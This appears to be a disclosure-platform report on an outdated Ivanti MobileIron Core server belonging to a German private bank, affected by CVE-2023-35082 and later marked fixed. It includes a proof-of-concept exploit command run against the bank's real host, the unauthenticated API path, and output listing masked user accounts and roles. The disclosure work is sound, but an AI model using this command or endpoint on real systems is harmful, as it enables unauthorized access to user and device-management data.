- Creation
- Validation
- Communication & fix
- Disclosure
bankhaus-lampe.de / hal-privatbank.com / Ivanti MobileIron core is outdated
Chocapikk
reported 2023-08-07
The following Ivanti MobileIron instance is publicly accessible and looks out-dated :
It is critical to update to a safe version as soon as possible since it could lead to instance and devices takeover. Those vulnerabilities are currently used in ransomware campaign and could damage your network.
Reference:
Proof Of Concept:
$ python3.10 exploit.py --verbose -u https://mobile.bankhaus-lampe.de 9:53:50
Fetching data from:
https://mobile.bankhaus-lampe.de:443/mifs/asfV3/api/v2/authorized/users?adminDeviceSpaceId=1
The response is not a valid JSON. The site is not vulnerable.
Fetching data from:
http://mobile.bankhaus-lampe.de:8080/mifs/asfV3/api/v2/authorized/users?adminDeviceSpaceId=1
http://mobile.bankhaus-lampe.de:8080 may be vulnerable
Fetching data from:
https://mobile.bankhaus-lampe.de:8080/mifs/asfV3/api/v2/authorized/users?adminDeviceSpaceId=1
Connection Error...
http://mobile.bankhaus-lampe.de:8080 may be vulnerable to CVE-2023-35082
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.hal-privatbank.com
Roles: ROLE_MPW_UNLOCK, ROLE_MPW_RESET_PIN, ROLE_MPW_REG, ROLE_MPW_LOCK, ROLE_USER_PORTAL_RW,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RESET_AC_PASSCODE
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.hal-privatbank.com
Roles:
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.hal-privatbank.com
Roles: ROLE_MPW_UNLOCK, ROLE_MPW_RESET_PIN, ROLE_MPW_REG, ROLE_MPW_LOCK, ROLE_USER_PORTAL_RW,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RESET_AC_PASSCODE
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.hal-privatbank.com
Roles: ROLE_MPW_UNLOCK, ROLE_MPW_RESET_PIN, ROLE_MPW_REG, ROLE_MPW_LOCK, ROLE_USER_PORTAL_RW,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RESET_AC_PASSCODE
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.hal-privatbank.com
Roles:
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.hal-privatbank.com
Roles: ROLE_MPW_UNLOCK, ROLE_MPW_RESET_PIN, ROLE_MPW_REG, ROLE_MPW_LOCK, ROLE_USER_PORTAL_RW,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RESET_AC_PASSCODE
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.hal-privatbank.com
Roles: ROLE_MPW_UNLOCK, ROLE_MPW_RESET_PIN, ROLE_MPW_REG, ROLE_MPW_LOCK, ROLE_USER_PORTAL_RW,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RESET_AC_PASSCODE
IP:
80.150.78.149Port:
443Detected protocol:
httpsVulnerable URL:
https://mobile.bankhaus-lampe.deFound vulnerable Ivanti MobileIron Core instance:
Affected by CVE-2023-35082
CVE-2023-35082 found on port 8080
Found by MobileIronCorePlugin 2023-08-07
Report created by
Chocapikk
2023-08-07
Chocapikk
2023-08-07
Report approved by
BloodyShell
2023-08-07
BloodyShell
2023-08-07
New PDF report generated by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report approved by
BloodyShell
2023-08-07
BloodyShell
2023-08-07
New PDF report generated by system 2023-08-07
Report comment dispatched to BloodyShell by system 2023-08-07
Report comment dispatched to cristi by system 2023-08-07
Report comment dispatched to fokoil by system 2023-08-07
Report comment dispatched to BloodyShell by system 2023-08-07
Report comment dispatched to cristi by system 2023-08-07
Report comment dispatched to fokoil by system 2023-08-07
Report comment dispatched to BloodyShell by system 2023-08-07
Report comment dispatched to cristi by system 2023-08-07
Report comment dispatched to fokoil by system 2023-08-07
Report edited by
BloodyShell
2023-08-13
BloodyShell
2023-08-13
New PDF report generated by system 2023-08-13
Report marked as fixed by
BloodyShell
2023-08-13
BloodyShell
2023-08-13
Report closed by
BloodyShell
2023-08-13
BloodyShell
2023-08-13
New PDF report generated by system 2023-08-13
Report edited by
Chocapikk
2023-08-13
Chocapikk
2023-08-13
New PDF report generated by system 2023-08-13
Information
Owner
bankhaus-lampe.de / hal-privatbank.com
Created
2023-08-07 19:54
Updated
2023-08-13 21:50
Fixed
true
Contacts
F...@hal-privatbank.com
i...@hal-privatbank.com
W...@hal-privatbank.com
C...@hal-privatbank.com
v...@hal-privatbank.com
K...@hal-privatbank.com
A...@hal-privatbank.com
K...@hal-privatbank.com
M...@hal-privatbank.com
M...@hal-privatbank.com
Status
Status
closed
Hosting contacted
false
CERT contacted
false
Download report